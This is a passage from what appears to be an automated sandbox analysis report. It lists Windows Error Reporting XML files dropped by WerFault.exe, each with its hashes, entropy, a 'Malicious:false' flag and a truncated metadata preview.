                                                    SHA-512:0F6F7D601E59B303A5871BF39C9E3C62CD1B1B7910023A6BE31912CBC0E1F44F60B587173CB3124290512FA3DF3CF7417A5D538502175114D100BFCC7BD720AA
                                                    Malicious:false
                                                    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.8.5.2.<./.P.i.

                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER744E.tmp.xml

                                                    Download File
                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):4564
                                                    Entropy (8bit):4.4264332111784
                                                    Encrypted:false
                                                    SSDEEP:48:cvIwWl8zsCuJg77aI9+ZWpW8VY8YYm8M4JTHFF3x+q87K7I3dBxd:uIjfCkI7Eo7VVVJn3xnk3dBxd
                                                    MD5:A28C6A1F5123330ECC3D8BD3FD3C5FAB
                                                    SHA1:B282E8609A452E5295E6CA24F83AE667AB440FE7
                                                    SHA-256:FA71B58DA0B9E1C85573EC93D1A0F3EF1EFA619AB53ABACE2EC58CC7DCFAEEF2
                                                    SHA-512:38D67EFCFEDA57E11482804716796AA76BE9115A2046C67D7826DA323ADD54B0142C33B401EA68F6CC7AF42763E4241E824F04814B1AF133E3549CA1B028073B
                                                    Malicious:false
                                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="306646" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER745D.tmp.WERInternalMetadata.xml

                                                    Download File
                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):8252
                                                    Entropy (8bit):3.6765869898098247
                                                    Encrypted:false
                                                    SSDEEP:192:R6l7wVeJ4D6Hw6YWV6SgmfUlpx+89bOusfG6m:R6lXJc6Hw6Yc6SgmfUtOtfy
                                                    MD5:2C4674CD003BB87DD69ACA9B2F8BFB5F
                                                    SHA1:5AFFBCAF8F2F4A60807698B171874E2C47A47EBA
                                                    SHA-256:8DDE948E70CD1CFE6204349B0D89E980E3EF22356FB5F9299CD88E8A628360AB
                                                    SHA-512:09246FF6A8531C0A406D849488C4DEF1F0D4E6AD9240C4A880D1991C272C37F9EFDADCE20B4098EDAB47EA84855A40C23F955DF5AC08B469D30B04C9F71BA907
                                                    Malicious:false
                                                    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.6.7.2.<./.P.i.

                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER746C.tmp.WERInternalMetadata.xml

                                                    Download File
                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):8252
                                                    Entropy (8bit):3.6759951217344486
                                                    Encrypted:false
                                                    SSDEEP:192:R6l7wVeJ716r6YWW6SgmfUlpxW89bOmsfg6m:R6lXJZ6r6Yf6SgmfUVOFfM
                                                    MD5:091237A6284B429D50C063A656892831
                                                    SHA1:294B57F470CD3DF5FE4EF8F87335C1A90E64C558
                                                    SHA-256:E0B3ED9A18880E407936486AE778E95C0BADD4774AA2C0C1A9E32A32B5FB044A
                                                    SHA-512:A4269DC4EBD365282F35C1922D561EB33825979E5F13947EF4FD0F293D2D7F1B72E075F3B58B5B555BCF3ACBE6938373A1C535BD9BDB70BA2FBAF5646369EA89
                                                    Malicious:false
                                                    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.3.5.2.<./.P.i.

                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER74CB.tmp.xml

                                                    Download File
                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):4564
                                                    Entropy (8bit):4.420903366004985
                                                    Encrypted:false
                                                    SSDEEP:48:cvIwWl8zsCuJg77aI9+ZWpW8VY80Ym8M4JTHFY+q87B1Zm7I3dBXd:uIjfCkI7Eo7VVBJuQ3mk3dBXd
                                                    MD5:31CE6AF1CC0EAD62E77D0696FF12C888
                                                    SHA1:5BEFB873620B15FA2FF28C3AE65E8D1AC2E57E4E
                                                    SHA-256:0B88519218B5065B602886A734B7DB28E3F331593FAC286E2267096F9BC3885F
                                                    SHA-512:530868093B5669442EE6C6C9D04B1346DFFD5C807F9F3F0DFAEC130E09D09405A2EF31B4AEF7FAB616774572F8637E2609536FA04900CB926B23E9AC67783515
                                                    Malicious:false
                                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="306646" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER7558.tmp.xml

                                                    Download File
                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):4564
                                                    Entropy (8bit):4.423036435354077
                                                    Encrypted:false
                                                    SSDEEP:48:cvIwWl8zsCuJg77aI9+ZWpW8VY81Ym8M4JTHFg1+q87z7I3dBgd:uIjfCkI7Eo7VVEJi16k3dBgd
                                                    MD5:8D31AB3807A1757EE366E32CE7510158
                                                    SHA1:E5D9B34056F7BE3E15301D31EDBC2E5E073CDBA0
                                                    SHA-256:3E224B33DDEB8E705E7CD0BC58F53C09A127617CB15930DE86BEC65F352FB25D
                                                    SHA-512:C60638100025A2A69F997EFA912E6ED204AC24234048F4D2D276A2296284185184958016A1A1BFDB7BFD3DA0D9371771CDDD22C432DB3E7C813C9C23BC31412F
                                                    Malicious:false
                                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="306646" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER8CC7.tmp.WERInternalMetadata.xml

                                                    Download File
                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):8250
                                                    Entropy (8bit):3.675575760443084
                                                    Encrypted:false
                                                    SSDEEP:192:R6l7wVeJbt6Y6YWc6Dy6TgmfUlpxT89bf8sfFYVm:R6lXJh6Y6Y16Dy6TgmfU+fPfFn
                                                    MD5:FE021C525185CE2A5B60D9781215E456
                                                    SHA1:939BE666356B986FDA891222C3DB7649890356C0
                                                    SHA-256:9430B043A5CF4F4F55069BD97DDEAF0F7E1EE5ED281302BBD53D548E99275D51
                                                    SHA-512:123B6C68C5011CE13BEE290C1A6A9BF7387173187B664C7CD4D023C07AD7864BA78964C0280CE9D555D3A6A96FFEB98DADA8E11DE96EF5508A2B6E9B9B0A3BCB
                                                    Malicious:false
                                                    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.1.6.4.<./.P.i.

                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER8CE7.tmp.xml

                                                    Download File
                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):4564
                                                    Entropy (8bit):4.423885209290305
                                                    Encrypted:false
                                                    SSDEEP:48:cvIwWl8zsCuJg77aI9+ZWpW8VY80Ym8M4JTHFt+q8787I3dBsd:uIjfCkI7Eo7VVBJPlk3dBsd
                                                    MD5:8815B1CC2E84A55539F3013F615A894F
                                                    SHA1:BC8A6F15EFBE601EA55C7BE605766487CE2054EF
                                                    SHA-256:3BE5735A7F95BAFDE0308B04EAC404F35205C098FEF10E299C2369AD6B679C2B
                                                    SHA-512:B2ABA50EEC037E5DA9D6953EE32FAEFB31EE26AECE1BD9521CCAFAA7B9651376A8367BE403F80B926F1C887BE5653E0283E50D7234D13CAA2DC8F6C2B2B08279
                                                    Malicious:false
                                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="306646" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERC54C.tmp.WERInternalMetadata.xml

                                                    Download File
                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):8250
                                                    Entropy (8bit):3.6748210069429716
                                                    Encrypted:false
                                                    SSDEEP:192:R6l7wVeJtX6HV6YWs6HygmfUlpxj89bnysf0xuNm:R6lXJ96HV6YV6SgmfUOnxf2
                                                    MD5:EF84164063E4A443360B9597F1FFA9ED
                                                    SHA1:8562B5FBA5A349645DBD851AB6362A8C78629352
                                                    SHA-256:A9C16EA35687403F91C243EFB420DFA54D161AEC2C7004DB22E75CFE65FDD270
                                                    SHA-512:2970E3F93A2991AA04372D9EE148E738E5C3C26F053DF26F567062E5B17E2F4D7D0BA1CA346DC8559E337642AA52D151F57E54DA031AC5C66C4E4E3478B005EB
                                                    Malicious:false
                                                    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.7.3.2.<./.P.i.

                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERC55B.tmp.WERInternalMetadata.xml

                                                    Download File
                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):8250
                                                    Entropy (8bit):3.6754847680072107
                                                    Encrypted:false
                                                    SSDEEP:192:R6l7wVeJXI6e6YWV6HygmfUlpxT89bnqsfD8Nm:R6lXJ46e6Ys6SgmfU+nJfv
                                                    MD5:B09E4CFA9F1EE4457B2C5626A53026C7
                                                    SHA1:04C0689ECF122AE68DE2F0A380DAACDE6CBAE909
                                                    SHA-256:AC1357F0C064DFEFC62611ABF930B338DECE7C4E2D6403C9542941708E0B3315
                                                    SHA-512:4CAB2AF1D7C6EA443435E3D23406F5607093B9948EDFEA41088A106B5FD437A4C9CC3C3E0A53B53864E767906D4EE1052065DC462396F4732321E01E03550BF5
                                                    Malicious:false
                                                    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.6.3.2.<./.P.i.

                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERC57B.tmp.xml

                                                    Download File
                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):4564
                                                    Entropy (8bit):4.425998232024977
                                                    Encrypted:false
                                                    SSDEEP:48:cvIwWl8zsEJg77aI9+ZWpW8VY8KYm8M4JTHF+m+q8797I3dBmd:uIjfCI7Eo7VVjJQmwk3dBmd
                                                    MD5:BDAD1F361E9050B5274A8D6326669A81
                                                    SHA1:E701A5277E005F900BE075ACBCD24A88F2BDEB1B
                                                    SHA-256:7ED6B1A0E8D0DDBB0E607094B1D9C0AEE1F7345E049000D79B47D5759098FD56
                                                    SHA-512:2E576E506CC865A6B1B11FF6ADB5129EB323AF1B04A41E13CFC059B52E8044FB2FC773A452E530571C2D8BD7E7FDECC378E4A1BBD5357515FAAF315D412ABAD0
                                                    Malicious:false
                                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="306647" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERC5E9.tmp.WERInternalMetadata.xml

                                                    Download File
                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):8250
                                                    Entropy (8bit):3.6753653664047388
                                                    Encrypted:false
                                                    SSDEEP:192:R6l7wVeJ6ul6F6YW46rgmfUlpxO89bnxsfyNm:R6lXJ/6F6YR6rgmfUNnqfB
                                                    MD5:37803F9E327F95B86F64F3DEB6439220
                                                    SHA1:596C4CA927317C77D57BFACFF0BCF6A3810CDC2B
                                                    SHA-256:B2CBF941D8F17CA5AA7D9D4738072A9253C73509E05ADB63DEB977FAC31DC957
                                                    SHA-512:D94D67929F4477ED81D637F0DEEE429BC4814D3CA28D92EBA5CB898C512D32305E474A845697C863DE0E32DCB1681B1C084E1D1C76FEBB0E7980408B948D0172
                                                    Malicious:false
                                                    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.1.2.8.<./.P.i.

                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERC609.tmp.xml

                                                    Download File
                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):4564
                                                    Entropy (8bit):4.424059776003986
                                                    Encrypted:false
                                                    SSDEEP:48:cvIwWl8zsEJg77aI9+ZWpW8VY8RYm8M4JTHFLj+q87G7I3dBQd:uIjfCI7Eo7VVQJl/k3dBQd
                                                    MD5:7DE815801FFCBCF51329E071A28F9449
                                                    SHA1:E92D10AE1C56F4B655749FB3458B7AE6111D2574
                                                    SHA-256:3A32CCF6474D0A48CCD1FA5F6A3149038DE6AB308C896AB495966F8BD9324C8C
                                                    SHA-512:83B4EB8A0C33D57FDF864ABD2E683A4C1E0AB372035012F1993B26A9C975318DA11EDA0B97D043A42136EA71C357BF79DF4FE07A0997400C208EC54A91F63B8A
                                                    Malicious:false
                                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="306647" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERC657.tmp.xml

                                                    Download File
                                                    Process:C:\Windows\SysWOW64\WerFault.exe
